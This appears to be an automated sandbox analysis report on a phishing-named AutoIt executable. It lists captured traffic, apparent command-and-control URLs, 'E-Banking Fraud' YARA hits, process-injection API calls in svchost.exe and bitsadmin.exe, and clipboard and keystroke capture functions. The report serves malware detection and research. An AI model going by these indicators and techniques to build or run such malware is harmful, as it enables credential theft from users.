6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 09:19:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 09:19:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 09:19:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 09:19:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: svchost.exe, 00000007.00000003.1487758942.0000000003248000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1487651668.000000000321A000.00000004.00000020.00020000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3131667346.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 0000000B.00000002.3135966624.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3134163502.000000000418C000.00000004.10000000.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000C.00000002.3133152941.0000000002F9C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?T0_8iD=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: KOXlLfnDPX.exe, 0000000C.00000002.3134906846.00000000049F6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnwithus.site
                Source: KOXlLfnDPX.exe, 0000000C.00000002.3134906846.00000000049F6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnwithus.site/alu5/
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 0000000B.00000002.3134163502.0000000003CD6000.00000004.10000000.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000C.00000002.3133152941.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 0000000B.00000002.3131094091.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 0000000B.00000002.3131094091.0000000002BEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 0000000B.00000002.3131094091.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 0000000B.00000002.3131094091.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 0000000B.00000002.3131094091.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 0000000B.00000002.3131094091.0000000002BEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 0000000B.00000003.1702651807.0000000007905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00806B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00806B0C
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00806D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00806D07
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00806B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00806B0C
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_007F2B37

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3134906846.00000000049A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3130699623.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1518731494.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3133086926.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132982209.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1524405847.0000000007D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132905244.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1519816258.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: This is a third-party compiled AutoIt script.1_2_007B3D19
                Source: RFQ 3100185 MAHAD.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RFQ 3100185 MAHAD.exe, 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_afe5db2a-e
                Source: RFQ 3100185 MAHAD.exe, 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: ~SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_47ee0c86-7
                Source: RFQ 3100185 MAHAD.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ea701ff2-c
                Source: RFQ 3100185 MAHAD.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_68a786d4-d
                Source: initial sampleStatic PE information: Filename: RFQ 3100185 MAHAD.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042CA93 NtClose,7_2_0042CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872B60 NtClose,LdrInitializeThunk,7_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038735C0 NtCreateMutant,LdrInitializeThunk,7_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03874340 NtSetContextThread,7_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03874650 NtSuspendThread,7_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872B80 NtQueryInformationFile,7_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872BA0 NtEnumerateValueKey,7_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872BE0 NtQueryValueKey,7_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872BF0 NtAllocateVirtualMemory,7_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872AB0 NtWaitForSingleObject,7_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872AD0 NtReadFile,7_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872AF0 NtWriteFile,7_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872F90 NtProtectVirtualMemory,7_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872FA0 NtQuerySection,7_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872FB0 NtResumeThread,7_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872FE0 NtCreateFile,7_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872F30 NtCreateSection,7_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872F60 NtCreateProcessEx,7_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872E80 NtReadVirtualMemory,7_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872EA0 NtAdjustPrivilegesToken,7_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872EE0 NtQueueApcThread,7_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872E30 NtWriteVirtualMemory,7_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872DB0 NtEnumerateKey,7_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872DD0 NtDelayExecution,7_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872D00 NtSetInformationFile,7_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872D10 NtMapViewOfSection,7_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872D30 NtUnmapViewOfSection,7_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872CA0 NtQueryInformationToken,7_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872CC0 NtQueryVirtualMemory,7_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872CF0 NtOpenProcess,7_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872C00 NtQueryInformationProcess,7_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872C60 NtCreateKey,7_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872C70 NtFreeVirtualMemory,7_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03873090 NtSetValueKey,7_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03873010 NtOpenDirectoryObject,7_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038739B0 NtGetContextThread,7_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03873D10 NtOpenProcessToken,7_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03873D70 NtOpenThread,7_2_03873D70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03104340 NtSetContextThread,LdrInitializeThunk,11_2_03104340
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03104650 NtSuspendThread,LdrInitializeThunk,11_2_03104650
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102B60 NtClose,LdrInitializeThunk,11_2_03102B60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03102BA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03102BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03102BE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102AD0 NtReadFile,LdrInitializeThunk,11_2_03102AD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102AF0 NtWriteFile,LdrInitializeThunk,11_2_03102AF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102F30 NtCreateSection,LdrInitializeThunk,11_2_03102F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102FB0 NtResumeThread,LdrInitializeThunk,11_2_03102FB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102FE0 NtCreateFile,LdrInitializeThunk,11_2_03102FE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03102E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03102EE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03102D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03102D30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102DD0 NtDelayExecution,LdrInitializeThunk,11_2_03102DD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03102DF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03102C70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102C60 NtCreateKey,LdrInitializeThunk,11_2_03102C60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03102CA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031035C0 NtCreateMutant,LdrInitializeThunk,11_2_031035C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031039B0 NtGetContextThread,LdrInitializeThunk,11_2_031039B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102B80 NtQueryInformationFile,11_2_03102B80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102AB0 NtWaitForSingleObject,11_2_03102AB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102F60 NtCreateProcessEx,11_2_03102F60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102F90 NtProtectVirtualMemory,11_2_03102F90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102FA0 NtQuerySection,11_2_03102FA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102E30 NtWriteVirtualMemory,11_2_03102E30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102EA0 NtAdjustPrivilegesToken,11_2_03102EA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102D00 NtSetInformationFile,11_2_03102D00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102DB0 NtEnumerateKey,11_2_03102DB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102C00 NtQueryInformationProcess,11_2_03102C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102CC0 NtQueryVirtualMemory,11_2_03102CC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03102CF0 NtOpenProcess,11_2_03102CF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03103010 NtOpenDirectoryObject,11_2_03103010
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03103090 NtSetValueKey,11_2_03103090
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03103D10 NtOpenProcessToken,11_2_03103D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03103D70 NtOpenThread,11_2_03103D70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00759220 NtCreateFile,11_2_00759220
